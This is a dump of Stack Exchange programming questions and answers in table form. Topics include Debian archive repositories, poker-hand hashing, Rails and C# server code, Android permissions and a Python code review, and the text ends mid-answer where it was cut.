id
stringlengths 5
27
| question
stringlengths 19
69.9k
| title
stringlengths 1
150
| tags
stringlengths 1
118
| accepted_answer
stringlengths 4
29.9k
⌀ |
---|---|---|---|---|
_unix.66830 | Debian Lenny, the current oldstable, ceased receiving security updates early in February, and now seems to no longer be hosted at the usual FTP mirrors (see, e.g., curl http://ftp.nl.debian.org/debian/dists/lenny/ | less). Are there any surviving FTP repositories of Lenny that can be used via APT? | Are there any source APT repositories for Debian Lenny? | debian | As answered at serverfault.com or more verbose at superuser.com,you need to use now archive.debian.org:deb http://archive.debian.org/debian/ lenny contrib main non-freedeb http://archive.debian.org/debian-security lenny/updates mainTo get the GPG key: apt-get install debian-archive-keyring |
_webmaster.2042 | I'm looking into implementing the Facebook like-button on my site. Therefore i'm looking for some good examples of the use of the like-button.I'm looking at the placement of the like-button and the use of the Open Graph meta-properties.Please explain why you like a particular implementation | What is the best implementation of the Facebook like-button you've seen? | facebook | null |
_cs.72542 | A deck of cards is 52. A hand is 5 cards from the 52 (cannot have a duplicate). What is the least amount of bits to represent a 5 card hand and how?A hand is NOT order dependent (KQ = QK). 64329 = 96432Yes, can use 52 bits. That can represent a hand of any number of cards. Given a hand is exactly 5 cards is there a way to represent it with less than 52 bits. A single card can be represented with 6 bits = 64. So could just use 6 bits * 5 cards = 30 bits. But that would be order dependent. I could just sort and this should work. If that would not work please let me know. Is there a way to get the key to 32 bits or under and not have to sort the 5 card tuple. This is for poker simulations and sorting would be a lot of overhead compared to just generating the hand. If I have a dictionary with the relative value of each hand it is two simple lookups and a comparison to compare the value of two hands. If I have to sort the hands first that is large compared to two lookups and a comparison. In a simulation will compare millions. I will not get sorted hands from the simulation. The sort is not simple like 52 51 50 49 48 before 52 51 50 49 47. You can have straight flush quads ....There are 2598960 possible 5 card hands. That is the number of rows. The key is the 5 cards. I would like to get a key that is 32 bits or under where the the cards do not need to be sorted first. Cannot just order the list as many hands tie. Suit are spade, club, diamond, and heart. 7c 8c 2d 3d 4s = 7s 8s 2c 3c 4h. There is a large number of ties.The next step is 64 bits and will take the hit of the sort rather than double the size of the key. I tested and SortedSet<int> quickSort = new SortedSet<int>() { i, j, k, m, n }; doubles the time of the operation but I still may do it.It gets more complex. I need to be able to represent a boat as twos over fives (22255). So sorting them breaks that. I know you are going to say but that is fast. Yes it is fast and trivial but I need as fast as possible.C# for the accepted answer: private int[] DeckXOR = new int[] {0x00000001,0x00000002,0x00000004,0x00000008,0x00000010,0x00000020,0x00000040, 0x00000080,0x00000100,0x00000200,0x00000400,0x00000800,0x00001000,0x00002000, 0x00004000,0x00008000,0x00010000,0x00020000,0x00040000,0x00080000,0x00100000, 0x00200000,0x00400000,0x00800000,0x01000000,0x02000000,0x04000000,0x07fe0000, 0x07c1f000,0x0639cc00,0x01b5aa00,0x056b5600,0x04ed6900,0x039ad500,0x0717c280, 0x049b9240,0x00dd0cc0,0x06c823c0,0x07a3ef20,0x002a72e0,0x01191f10,0x02c55870, 0x007bbe88,0x05f1b668,0x07a23418,0x0569d998,0x032ade38,0x03cde534,0x060c076a, 0x04878b06,0x069b3c05,0x054089a3};public void PokerProB(){ Stopwatch sw = new Stopwatch(); sw.Start(); HashSet<int> cardsXOR = new HashSet<int>(); int cardXOR; int counter = 0; for (int i = 51; i >= 4; i--) { for (int j = i - 1; j >= 3; j--) { for (int k = j - 1; k >= 2; k--) { for (int m = k - 1; m >= 1; m--) { for (int n = m - 1; n >= 0; n--) { counter++; cardXOR = DeckXOR[i] ^ DeckXOR[j] ^ DeckXOR[k] ^ DeckXOR[m] ^ DeckXOR[n]; if (!cardsXOR.Add(cardXOR)) Debug.WriteLine(problem); } } } } } sw.Stop(); Debug.WriteLine(Count {0} millisec {1} , counter.ToString(N0), sw.ElapsedMilliseconds.ToString(N0)); Debug.WriteLine();} | Represent a 5 card poker hand | combinatorics | Let $C$ be a $[52,25,11]$ code. The parity check matrix of $C$ is a $27 \times 52$ bit matrix such that the minimal number of columns whose XOR vanishes is $11$. Denote the $52$ columns by $A_1,\ldots,A_{52}$. We can identify each $A_i$ as a binary number of length $27$ bits. The promise is that the XOR of any $1$ to $10$ of these numbers is never $0$. Using this, you can encode your hand $a,b,c,d,e$ as $A_a \oplus A_b \oplus A_c \oplus A_d \oplus A_e$, where $\oplus$ is XOR. Indeed, clearly this doesn't depend on the order, and if two hands $H_1,H_2$ collide, then XORing the two hash values gives $10-2|H_1 \cap H_2|\leq 10$ numbers whose XOR is zero.Bob Jenkins describes such a code in his site, and from that we can extract the array0x00000001,0x00000002,0x00000004,0x00000008,0x00000010,0x00000020,0x00000040,0x00000080,0x00000100,0x00000200,0x00000400,0x00000800,0x00001000,0x00002000,0x00004000,0x00008000,0x00010000,0x00020000,0x00040000,0x00080000,0x00100000,0x00200000,0x00400000,0x00800000,0x01000000,0x02000000,0x04000000,0x07fe0000,0x07c1f000,0x0639cc00,0x01b5aa00,0x056b5600,0x04ed6900,0x039ad500,0x0717c280,0x049b9240,0x00dd0cc0,0x06c823c0,0x07a3ef20,0x002a72e0,0x01191f10,0x02c55870,0x007bbe88,0x05f1b668,0x07a23418,0x0569d998,0x032ade38,0x03cde534,0x060c076a,0x04878b06,0x069b3c05,0x054089a3Since the first 27 vectors are just the 27 numbers of Hamming weight 1, in order to check that this construction is correct it suffices to consider all $2^{52-27}-1 = 2^{25}-1$ possible non-trivial combinations of the last 25 numbers, checking that their XORs always have Hamming weight at least 10. For example, the very first number 0x07fe0000 has Hamming weight exactly 10. |
_reverseengineering.9126 | I've been trying to google any information about how can i create a viewer for some custom file formats.In my case I've extracted multiple .tbl files from game sources. This file contains a database table. From what I was able to google, I was able to extract file header. I have tried some tbl-viewers but they say file is corrupted, so i assume that custom encryption presents here.First Bytes of file 1:00000000 46 54 41 42 4c 45 00 00 00 00 10 00 21 00 00 0000000010 03 00 00 00 2c 00 00 00 b0 00 00 00 b4 00 00 0000000020 10 00 00 00 c4 02 00 00 00 00 00 00 01 00 00 0000000030 02 00 00 00 03 00 00 00 04 00 00 00 05 00 00 00First Bytes of file 2:00000000 46 54 41 42 4c 45 00 00 00 00 10 00 22 00 00 0000000010 15 00 00 00 2c 00 00 00 b4 00 00 00 ca 00 00 0000000020 58 00 00 00 7a 0c 00 00 00 00 00 00 01 00 00 0000000030 02 00 00 00 03 00 00 00 04 00 00 00 06 00 00 00So in this case first 12 bytes seem to be the file header46 54 41 42 4c 45 00 00 00 00 10 00which stand for FTABLE......And this is where i am stuck at. I didnt find information on what to do next to achieve my goal | File reverse engineering - .tbl format | file format;encryption | null |
_softwareengineering.333435 | TL;DROur app has a Django backend and an Angular 2 frontend; we package it up in Docker. Our client wishes to run this app on their HPC hardware. In return, they pay us a monthly 'subscription'.How can we make sure that the client cannot cancel the contract with us but continue to use the software?More detailWe have made this app that manages simulations and the data from simulations that use an HPC resource. We intend to make this a cloud-based thing but we have a client who wants to use their own hardware.We have a good relationship with them and value their feedback, so we're happy with this arrangement.Our concern is if we try to enter similar agreements with other clients we don't know in the future. We'd probably want to let them trial the software first, but how do we prevent them from running off with it afterwards?We have a Django backend and an Angular 2 frontend. I don't know if that makes a big difference.I understand we can obfuscate the code somewhat. Though, there will always be a way back to the original code. Our bigger concern is that someone can stop paying the bills but continue to use our software.Is there some way we can license the app? I wonder if there is a way to make the code only work if a valid key is provided. These keys would become invalid over time. We would be the only ones who could generate these keys.Oh. And this client's HPC doesn't connect to the internet. So no cloud-based authorisation is going to work, I don't think.Any ideas? | How to control use software hosted on client's computer | licensing;client relations | null |
_codereview.123950 | private void loadTabsIfGPSAndInternetAvailable() { final Utils utils = new Utils(this); final LocationClient locationClient = new LocationClient(this); if (!utils.isConnected()) { utils.generateNoConnectivityAlert(); } else if (!locationClient.hasGPS()) { utils.generateNoGPSAlert(); } else { if (androidVersion >= Build.VERSION_CODES.M) { requestAllPermissions(); } else { loadCameraAndForecastTabs(); } } // ends else block for if internet and GPS are enabled }This is some code that loads tabs if the GPS and internet connectivity are available. I'm aware that at the moment this is very messy code, with lots of nested if statements, that is hard to read, and am not sure how to structure it better. Can people help me please? | Asking for GPS and Internet permissions | java;android | null |
_unix.283531 | A have a brand new 16GB class 10 SD card and produce a very strange behavior.After I attached the the card with an USB SD-Card reader, the device appeared as /dev/sdb. I tried to copy a 2GB raw image with dd into, but it's immediately returns: No more space left on device.The block device shows: there is only 10M space on it.ls -lah /dev/sdb-rw-r--r-- 1 root root 10M mj 16 23:16 /dev/sdbfdisk shows the same size:fdisk -l /dev/sdbDisk /dev/sdb: 10 MiB, 10485760 bytes, 20480 sectorsUnits: sectors of 1 * 512 = 512 bytesSector size (logical/physical): 512 bytes / 512 bytesI/O size (minimum/optimal): 512 bytes / 512 bytesDisklabel type: dosDisk identifier: 0x84f9d19fI've tried the SD-card with another reader, but looks like it's not a card reader issue, the size of the SD card is 10M with every single reader.cat /proc/partitionsmajor minor #blocks name... 8 16 15558144 sdb...The interesting part is: the kernel looks like actually knows the right size of SD card.cat /sys/block/sdb/size31116288 # numbers of 512 byte blocks => 15.93 GBAnd seems like it's properly recognized.May 16 22:58:07 DDSI-Laptop kernel: [258762.883672] usb 1-3: New USB device found, idVendor=14cd, idProduct=125cMay 16 22:58:07 DDSI-Laptop kernel: [258762.883674] usb 1-3: New USB device strings: Mfr=1, Product=3, SerialNumber=2May 16 22:58:07 DDSI-Laptop kernel: [258762.883675] usb 1-3: Product: Mass Storage DeviceMay 16 22:58:07 DDSI-Laptop kernel: [258762.883676] usb 1-3: Manufacturer: GenericMay 16 22:58:07 DDSI-Laptop kernel: [258762.883677] usb 1-3: SerialNumber: 125C20100726May 16 22:58:07 DDSI-Laptop kernel: [258762.883972] usb-storage 1-3:1.0: USB Mass Storage device detectedMay 16 22:58:07 DDSI-Laptop kernel: [258762.884114] scsi host52: usb-storage 1-3:1.0May 16 22:58:07 DDSI-Laptop mtp-probe: checking bus 1, device 30: /sys/devices/pci0000:00/0000:00:14.0/usb1/1-3May 16 22:58:07 DDSI-Laptop mtp-probe: bus: 1, device: 30 was not an MTP deviceMay 16 22:58:08 DDSI-Laptop kernel: [258763.881813] scsi 52:0:0:0: Direct-Access Mass Storage Device PQ: 0 ANSI: 0 CCSMay 16 22:58:08 DDSI-Laptop kernel: [258763.882008] sd 52:0:0:0: Attached scsi generic sg1 type 0May 16 22:58:08 DDSI-Laptop kernel: [258763.883073] sd 52:0:0:0: [sdb] 31116288 512-byte logical blocks: (15.9 GB/14.8 GiB)May 16 22:58:08 DDSI-Laptop kernel: [258763.883195] sd 52:0:0:0: [sdb] Write Protect is offMay 16 22:58:08 DDSI-Laptop kernel: [258763.883198] sd 52:0:0:0: [sdb] Mode Sense: 03 00 00 00May 16 22:58:08 DDSI-Laptop kernel: [258763.883312] sd 52:0:0:0: [sdb] No Caching mode page foundMay 16 22:58:08 DDSI-Laptop kernel: [258763.883315] sd 52:0:0:0: [sdb] Assuming drive cache: write throughWhat cause the difference? | linux: Class10 SD card different device and block device size | linux;debian;block device;sd card;partition table | - /dev/sdbThis is a regular file, not a device. You must have tried to write to /dev/sdb at some point when there was no device connected with this drive letter. Be careful! You were lucky not to overwrite a different device from the one you intended.Information about block devices in /proc and /sys is provided directly by the kernel uses the kernel's name for the device. Device nodes in /dev are managed by udev; they normally follow the kernel's device names (and add other names as symbolic links) but writing to /dev manually can disrupt udev. Since the directory entry /dev/sdb already existed, it didn't create the device node when you plugged in the SD card.Remove /dev/sdb, eject the SD card, plug it back in, and check what device name it gets. You should see a block device:$ ls -l /dev/sdbbrw-rw-rw- 1 root disk 8, 16 /dev/sdb |
_codereview.61080 | I have a Rails 3.2.14 app where I have a home controller (dashboard). In this controller and view I'm calling multiple instance variables to get different counts based off of scopes I've created in the Call and Unit model. I'd like to see if anyone has any suggestions on how I can DRY this up and query less so the controller/view loads faster. This code is very old and I'm looking for the best way to refactor it.home_controller.rb def index @calls = Call.open_status @all = Call.all @unit = Unit.active.order(unit_name) @avail = Unit.active.in_service @unavail = Unit.active.out_of_service @unassigned = Call.unassigned_calls @today = Call.today @year = Call.year @previous = Call.previous_year @assigned = Call.assigned_calls.until_end_of_day @unassigned = Call.unassigned_calls.until_end_of_day @scheduled = Call.scheduled_calls endendcall.rb model scope :open_status, where(call_status: open) scope :cancel, where(call_status: cancel) scope :closed, where(call_status: close) scope :waitreturn, where(wait_return: yes) scope :wc, lambda { where(service_level_id: ServiceLevel.find_by_level_of_service(WC).id) } scope :bls, lambda { where(service_level_id: ServiceLevel.find_by_level_of_service(BLS).id) } scope :als, lambda { where(service_level_id: ServiceLevel.find_by_level_of_service(ALS).id) } scope :micu, lambda { where(service_level_id: ServiceLevel.find_by_level_of_service(MICU).id) } scope :cct, lambda { where(service_level_id: ServiceLevel.find_by_level_of_service(CCT).id) } scope :assist, lambda { where(service_level_id: ServiceLevel.find_by_level_of_service(ASSIST).id) } scope :em, lambda { where(service_level_id: ServiceLevel.find_by_level_of_service(EM).id) } scope :by_service_level, lambda { |service_level| where(service_level_id: ServiceLevel.find_by_level_of_service(service_level).id) } scope :by_region, lambda { |region| where(region_id: Region.find_by_area(region).id) } scope :from_facility, lambda { |id| where(transfer_from_id: id) } scope :to_facility, lambda { |id| where(transfer_to_id: id) } scope :search_between, lambda { |start_date, end_date| where(transfer_date BETWEEN ? AND ?, start_date.beginning_of_day, end_date.end_of_day)} scope :search_by_start_date, lambda { |start_date| where('transfer_date BETWEEN ? AND ?', start_date.beginning_of_day, start_date.end_of_day) } scope :search_by_end_date, lambda { |end_date| where('transfer_date BETWEEN ? AND ?', end_date.beginning_of_day, end_date.end_of_day) } scope :open_calls, lambda { open_status.includes(:call_units).where([call_units.unit_id IS NOT NULL]) } scope :unassigned_calls, lambda { open_status.includes(:call_units).where([call_units.unit_id IS NULL]).order(transfer_date ASC) } scope :assigned_calls, lambda { open_status.includes(:call_units).where([call_units.unit_id IS NOT NULL]).order(transfer_date ASC) } scope :by_unit_name, lambda {|unit_name| joins(:units).where('units.unit_name = ?', unit_name)} scope :ambulance, lambda {joins(:units).where('units.vehicle_type = ?', Ambulance)} scope :wheelchair, lambda {joins(:units).where('units.vehicle_type = ?', Wheelchair)} scope :scheduled_calls, lambda { open_status.includes(:call_units).where([calls.transfer_date > ?, Time.zone.now.end_of_day]).order(transfer_date ASC) } scope :medic_calls, lambda { where([call_status = ? and call_units.unit_id IS NOT NULL, open]).order(id ASC) } scope :today, lambda { where(transfer_date BETWEEN ? AND ?, Time.zone.now.beginning_of_day, Time.zone.now.end_of_day) } scope :yesterday, lambda { where(transfer_date BETWEEN ? AND ?, 1.day.ago.beginning_of_day, 1.day.ago.end_of_day) } scope :year, lambda { where(transfer_date BETWEEN ? AND ?, Time.zone.now.beginning_of_year, Time.zone.now.end_of_year) } scope :previous_year, lambda {where(transfer_date BETWEEN ? AND ?, 1.year.ago.beginning_of_year, 1.year.ago.end_of_year)} scope :until_end_of_day, lambda { where(transfer_date < ?, Time.zone.now.end_of_day) }unit.rb model scope :in_service, lambda { where(status_id: Status.where(unit_status: [In Service, At Post, At Station]).map(&:id))} scope :out_of_service, lambda { where(status_id: Status.find_by_unit_status(Out of Service).id)} scope :active, where(unit_status: Active)home/index.html.erb<div class=main-area dashboard> <div class=container> <div class=row> <div class=span12> <div class=slate clearfix> <a class=stat-column href=#> <span class=number><%= @today.count %></span> <span>Today's Calls</span> <span class=number><%= @year.count %></span> <span>Current YTD Calls</span> <span class=number><%= @previous.count %></span> <span>Previous YTD Calls</span> <span class=number><%= @all.count %></span> <span>Calls To Date</span> </a> <a class=stat-column href=#> <span class=number><%= @calls.count %></span> <span>Open Calls</span> <span class=number><%= @assigned.count %></span> <span>Active Calls</span> <span class=number><%= @scheduled.count %></span> <span>Scheduled Calls</span> <span class=number><%= @unassigned.count %></span> <span>Unassigned Calls</span> </a> <a class=stat-column href=#> <span class=number><%= @today.ambulance.count %></span> <span>Ambulance Calls</span> <span class=number><%= @today.wheelchair.count %></span> <span>Wheelchair Calls</span> <span class=number><%= @avail.count %></span> <span>Units In Service</span> <span class=number><%= @unavail.count %></span> <span>Units Out of Service</span> </a> <a class=stat-column href=#> <span class=number><%= @today.bls.count %></span> <span>BLS Calls</span> <span class=number><%= @today.als.count %></span> <span>ALS Calls</span> <span class=number><%= @today.cct.count %></span> <span>CCT Calls</span> <span class=number><%= @today.micu.count %></span> <span>MICU Calls</span> </a> </div> </div> </div> <div class=row> <div class=span6> <div class=slate> <div class=page-header> <h2><i class=icon-signal pull-right></i>Medics</h2> </div> <table class=table table-striped table-bordered> <thead> <tr> <th>Unit</th> <th>Attendant</th> <th>InCharge</th> </tr> </thead> <tbody> <tr> <% @unit.each do |unit| %> <td><%= unit.try(:unit_name) %></td> <td><%= unit.attendant.try(:medic_name) %></td> <td><%= unit.incharge.try(:medic_name) %></td> </tr> <% end %> </tbody> </table> </div> </div> <div class=span6> <div class=slate> <div class=page-header> <h2><i class=icon-shopping-cart pull-right></i>Units</h2> </div> <table class=table table-striped table-bordered> <thead> <tr> <th>Unit</th> <th>Status</th> </tr> </thead> <tbody> <tr> <% @unit.each do |unit| %> <td><%= unit.try(:unit_name) %></td> <td><div class=<%= set_status(unit.status) %>><%= unit.status.try(:unit_status) %></div></td> </tr> <% end %> </tbody> </table> </div> </div> </div> </div> </div> | Controller and view to call multiple instance variables | ruby;html;ruby on rails;active record;erb | Wow... yeah, that's a lot.My immediate suggestion would be to simply make the dashboard do less. I doubt all of those things are of extreme importance all the time.A lot seems like historical data (that spans years), but it's shown along side current stuff (that spans hours, it seems). I imagine most users only use a fraction of all that (and some users are no doubt intimidated). No offense intended, but I imagine the UI is simply overwhelming users - until they learn to ignore almost all of it, and just focus on the things they actually need.If it must be on one page, load the less-important data on-demand via ajax.Second suggestion: Aggressively cache as much as you can. Cache, cache, cache. For instance, any YTD-value will by definition only change once per day, not for each request. Check out the Rails Guides for some ideas and ActiveSupport::Cache for the implementation, and/or look into things like redis and memcached.Rails has a lot built-in already, though. For instance, you could cache something like the last year's number of calls like so:class Call def self.previous_year_cached expiry = Time.zone.now.end_of_year - Time.zone.now Rails.cache.fetch([self.name, previous_year_count], expires_in: expiry) do self.previous_year.count end endendSo now, when you call Call.previous_year_cached it'll either give you a cached value without hitting the database, or it'll execute the block to find and store a new value. And it'll set the cache to expire on New Year's Eve (you could of course also just set to expire after 1.week or something, and skip the calculation, but it's just a little arithmetic).Second line of caching is view caching. The Rails Guides I linked to above provide a good introduction to those. View caching will often give you even more of a speed-up, since rendering views is time-consuming. So view caching will give you the most bang for your buck, because you're caching at the very last step before sending the page to the browser. But any kind of caching will help speed things up, so data caching like above will also help. That way, even if a view has to be re-rendered, it might still avoid hitting the database by pulling its values from the cache.You can also cache things without an explicit expiration date, and instead just flush (remove) the cache when it needs to update. For instance, you could cache today's calls, and flush the cached count when a new call record is added:class Call after_create :flush_cache after_destroy :flush_cache def self.today_count_cached Rails.cache.fetch([self.name, today_count]) { self.today.count } end private def flush_cache Rails.cache.delete([self.class.name, today_count]) endendYou can of course add many more cached values this way, choosing when to store and delete them. See ActiveRecord's callbacks for the triggers you can act on.Third option would be to do more client-side. Let users sort and filter instead of trying to anticipate every single data breakdown a user could want. Again, I doubt your users actually want all that data . They may think they do, but do they really? It's easy to say yes if we pretend there are no tradeoffs, but there are: usability and speed (and maintainability, and development time).Try checking out ux.stackexchange.com. Besides perhaps finding some good tips for organizing a lot of data, you'll no doubt also find studies that indicate exactly how much information a human being can actually process. It's always useful to have scientific studies to refer to, if you want to argue for a more simple design.I know it's trite, but less is more. Really.I know this isn't much of a code review, but the individual pieces look OK on their own. There are just too many pieces, if you ask me. The only thing that looks iffy (after a quick glance) are all the service level scopes. If you just make a scope for every conceivable service level, you might as well just have 1 scope with a lambda, and pass in the service level (or use service_level.calls). What you have right now is overly specific, and couples everything very tightly. |
_softwareengineering.142289 | How are authors able to write a book on a framework that is just released? A framework like spring is updated, and a book is released in the next day. Is this typically by people who are direct contributors? Are they basing it off of beta/alpha versions? I find this rather difficult to understand as that documentation is rarely up to snuff by the time the framework is updated. | How does one write a book on a new framework? | books;technical writing | Those who write books about frameworks are generally involved in the framework they are writing about, they have access to documentation and pre-release versions of the framework. They aren't random people that know about programming, they likely contacted the development team about writing a book and got the information or were asked by the development team to write a book. Also good frameworks keep their documentation up to date, its part of being a good framework, though the general public may not have access to the most up to date documentation. |
_webapps.86739 | I want to gather information and pictures from 100 college alumni. How can I do this in a way where I can send individual links to each alumni member? | How do I send individual links to collect data in Cognito Forms | cognito forms | null |
_unix.218797 | Hello I am newbie in bash and I am coding a daemon to execute a service. The syntax is ./ctlscript.sh start. When I execute service openproject start it should run this command, but it runs ./ctlscript.sh whitout a parameter and I get the usage. This is my script:#! /bin/sh### BEGIN INIT INFO# Provides: openproject# Required-Start: $remote_fs $syslog# Required-Stop: $remote_fs $syslog# Default-Start: 2 3 4 5# Default-Stop: 0 1 6# Short-Description: Openprject# Description: This file starts and stops Openproject server#### END INIT INFOOPENP_DIR=/opt/openprjcase $1 in start) su administrador -c $OPENP_DIR/ctlscript.sh start ;; stop) su administrador -c $OPENP_DIR/ctlscript.sh stop ;; restart) su administrador -c $OPENP_DIR/ctlscript.sh stop sleep 20 su administrador -c $OPENP_DIR/ctlscript.sh start ;; *) echo Usage: openproject {start|stop|restart} >&2 exit 3 ;;esacThis is what I get when I run service openproject stop. It is the same when I launch ./ctlscript.sh (without any parameter):usage: /opt/openprj/ctlscript.sh help /opt/openprj/ctlscript.sh (start|stop|restart|status) /opt/openprj/ctlscript.sh (start|stop|restart|status) mysql /opt/openprj/ctlscript.sh (start|stop|restart|status) memcached /opt/openprj/ctlscript.sh (start|stop|restart|status) apache /opt/openprj/ctlscript.sh (start|stop|restart|status) subversion /opt/openprj/ctlscript.sh (start|stop|restart|status) openprojecthelp - this screenstart - start the service(s)stop - stop the service(s)restart - restart or start the service(s)status - show the status of the service(s)Thanks in advance. | Execute sh with parameters in bash | bash;shell;daemon | The argument to -c must be a single word, so su administrador -c $OPENP_DIR/ctlscript.sh startFor restart, you should stop first, then start |
_codereview.72017 | I am working on a banking application. I want to create a multithreaded TCP Payment Card (iso8583) server that can handle passbook printing requests simultaneously. Multiple devices are connected to the server from different locations.I am going to use below code in my application. Is this thread safe? Can I face any problem in the future if I use this code? All suggestions welcome.class Program { static void Main(string[] args) { TcpListener serverSocket = new TcpListener(8888); TcpClient clientSocket = default(TcpClient); int counter = 0; serverSocket.Start(); Console.WriteLine( >> + Server Started); counter = 0; while (true) { counter += 1; clientSocket = serverSocket.AcceptTcpClient(); Console.WriteLine( >> + Client No: + Convert.ToString(counter) + started!); handleClinet client = new handleClinet(); client.startClient(clientSocket, Convert.ToString(counter)); } clientSocket.Close(); serverSocket.Stop(); // Console.WriteLine( >> + exit); Console.ReadLine(); } } //Class to handle each client request separatly public class handleClinet { TcpClient clientSocket; string clNo; public void startClient(TcpClient inClientSocket, string clineNo) { this.clientSocket = inClientSocket; this.clNo = clineNo; Thread ctThread = new Thread(doChat); ctThread.Start(); } private void doChat() { int requestCount = 0; byte[] bytesFrom = new byte[10025]; string dataFromClient = null; Byte[] sendBytes = null; string serverResponse = null; string rCount = null; requestCount = 0; while ((true)) { try { var respose = ; requestCount = requestCount + 1; NetworkStream networkStream = clientSocket.GetStream(); networkStream.Read(bytesFrom, 0, (int)clientSocket.ReceiveBufferSize); dataFromClient = System.Text.Encoding.ASCII.GetString(bytesFrom); // dataFromClient = dataFromClient.Substring(0, dataFromClient.IndexOf($)); Console.WriteLine( >> + From client- + clNo + dataFromClient); try { var isoPassbookRequestMessage = System.Text.Encoding.ASCII.GetString(bytesFrom); WebClient wc = new WebClient(); NameValueCollection input = new NameValueCollection(); input.Add(isoPassbookRequest, Convert.ToBase64String(bytesFrom)); respose = Encoding.ASCII.GetString(wc.UploadValues(http://localhost:52835/Transaction/PassbookTransactionRequest, input)); try { // CommonMethods.AddtoLogFile(PassbookTransactionResponse = Clientid- + clientID + ProcessingCode -930000 Message - + respose); // atmServer.Send(clientID, Encoding.ASCII.GetBytes(respose)); } catch (SocketException se) { //could not complete transaction //Send reversal to CBS } } catch (Exception e) { } rCount = Convert.ToString(requestCount); serverResponse = Server to clinet( + clNo + ) + rCount; sendBytes = Encoding.ASCII.GetBytes(respose); networkStream.Write(sendBytes, 0, sendBytes.Length); networkStream.Flush(); Console.WriteLine( >> + serverResponse); } catch (Exception ex) { Console.WriteLine( >> + ex.ToString()); } } } } | TCP Server with multithreading | c#;multithreading;asynchronous;socket;tcp | null |
_codereview.59867 | I'm working on a simple dictionary tool, with a base class that can be extended by plugins to represent different dictionaries. The base class does most of the heavy lifting: it keeps the index of all entries in memory, and it handles searching the index. Plugins that extend this class implement populating the index and loading the entries on demand, handling the specifics of the dictionary backend, such as the formatting of entries.These are the base classes:import abcfrom collections import defaultdictclass BaseEntry(object): def __init__(self, entry_id, name): self.entry_id = entry_id self.name = name @property def content(self): return { 'id': self.entry_id, 'name': self.name, 'content': [], 'references': [], } def __repr__(self): return '%s: %s' % (self.entry_id, self.name)class BaseDictionary(object): @abc.abstractproperty def name(self): return '<The Dictionary>' @abc.abstractproperty def is_public(self): return False @property def license(self): return None def __init__(self): self.items_sorted = {} self.items_by_name = defaultdict(list) self.items_by_id = {} self.load_index() def find(self, word, find_similar=False): matches = self.items_by_name.get(word) if matches: return matches if find_similar: return self.find_by_prefix(word, find_similar=True) return [] def find_by_prefix(self, prefix, find_similar=False): matches = [] for k in self.items_sorted: if k.startswith(prefix): matches.extend(self.items_by_name[k]) elif matches: break if find_similar and not matches and len(prefix) > 1: return self.find_by_prefix(prefix[:-1], find_similar=True) return matches def find_by_suffix(self, suffix): matches = [] for k in self.items_sorted: if k.endswith(suffix): matches.extend(self.items_by_name[k]) return matches def find_by_partial(self, partial): matches = [] for k in self.items_sorted: if partial in k: matches.extend(self.items_by_name[k]) return matches def get_entry(self, entry_id): entry = self.items_by_id.get(entry_id) if entry: return [entry] else: return [] def add(self, entry): self.items_by_name[entry.name].append(entry) self.items_by_id[entry.entry_id] = entry def reindex(self): self.items_sorted = sorted(self.items_by_name) @abc.abstractmethod def load_index(self): Populate the index. Implement like this: for entry in entries: self.add(entry) self.reindex() :return: passThis is an example plugin implementation:import osimport refrom settings import dictionary_pathfrom dictionary.base import BaseDictionary, BaseEntry, lazy_propertyINDEX_PATH = os.path.join(dictionary_path, 'index.dat')re_strong_defs = re.compile(r'(Defn:|Syn\.)')re_strong_numdots = re.compile(r'(\d+\. )')re_strong_alphadots = re.compile(r'(\([a-z]\))')re_em_roundbr = re.compile(r'(\([A-Z][a-z]+\.\))')re_em_squarebr = re.compile(r'(\[[A-Z][a-z]+\.\])')def load_entry_content(word, filename): path = os.path.join(dictionary_path, filename) if not os.path.isfile(path): return with open(path) as fh: count = 0 content = [] definition_list = [] for line in fh: # first line contains the term, and ignore next 2 lines if count < 3: if count == 0: word = line.strip().lower() count += 1 continue line = line.strip() line = line.replace('*', '') line = re_strong_defs.sub(r'**\1**', line) line = re_strong_numdots.sub(r'**\1** ', line) line = re_strong_alphadots.sub(r'**\1**', line) line = re_em_roundbr.sub(r'*\1*', line) line = re_em_squarebr.sub(r'*\1*', line) if line: content.append(line) else: definition_list.append(['', ' '.join(content)]) content = [] return { 'id': filename, 'name': word, 'content': definition_list, 'references': [] } class Dictionary(BaseDictionary): @property def name(self): return 'Webster\'s Unabridged Dictionary' @property def is_public(self): return True @property def license(self): return The content of this dictionary is for the use of anyone anywhere at no cost and with almost no restrictions whatsoever. You may copy it, give it away or re-use it under the terms of the Project Gutenberg License included online at www.gutenberg.net def load_index(self): with open(INDEX_PATH) as fh: for line in fh: (entry_id, name) = line.strip().split(':') entry = Entry(entry_id, name) self.add(entry) self.reindex() def get_entry(self, entry_id): entries = super(Dictionary, self).get_entry(entry_id) if not entries: entry = Entry(entry_id, '') if entry.content: entry.name = entry.content['name'] self.add(entry) return [entry] return entriesclass Entry(BaseEntry): @lazy_property def content(self): return load_entry_content(self.name, self.entry_id)An example dictionary file looks like this:chairChair, n. Etym: [OE. chaiere, chaere, OF. chaiere, chaere, F. chaire]1. A movable single seat with a back.2. An official seat, as of a chief magistrate or a judge, but esp.that of a professor; hence, the office itself.The chair of a philosophical school. Whewell.A chair of philology. M. Arnold.3. The presiding officer of an assembly; a chairman; as, to addressthe chair.4. A vehicle for one person; either a sedan borne upon poles, or two-wheeled carriage, drawn by one horse; a gig. Shak.Think what an equipage thou hast in air, And view with scorn twopages and a chair. Pope.5. An iron blok used on railways to support the rails and secure themto the sleepers. Chair days, days of repose and age.-- To put into the chair, to elect as president, or as chairman of ameeting. Macaulay.-- To take the chair, to assume the position of president, or ofchairman of a meeting.I'm looking for a general review:Is this code Pythonic?Is this is good object oriented design? Would you design the class structure differently?Other things you'd do differently? (Apart from using a database to handle the indexing of entries, a feature I plan to add soon.)The open-source project is here. | A simple dictionary tool, extensible with plugins | python;object oriented | A quick review of the base classes.There's no documentation. What does this code do? How am I supposed use it? What is the interface? When I subclass one of your base classes, what are my responsibilities? What properties and methods do I need to implement and what must they return?The interface seems inconvenient. If you want to know an entry's id, then it looks like you have to write:entry.content['id']which seems unnecessarily verbose compared to something like entry.id.In BaseEntry.content you construct a new dictionary each time the method is called. This seems wasteful since the dictionary is always the same.Good practice for __repr__ methods is to output something that will evaluate to an equivalent object. So I'd write:def __repr__(self): return '{0.__name__}({1.id}, {1.name})'.format(type(self), self)When you have an interface that needs to read the contents of a file, it's best practice to design the interface so that you can pass either a file name or a file object.The reason for this is that if an interface only accepts a file name, then you can only pass it data via the local file system, and that when the data comes from a network connection, or from a test case in Python source code, or is constructed in memory, then you have to save that data out to a temporary file. It is much more convenient to construct and pass a file object in these cases.(See for example 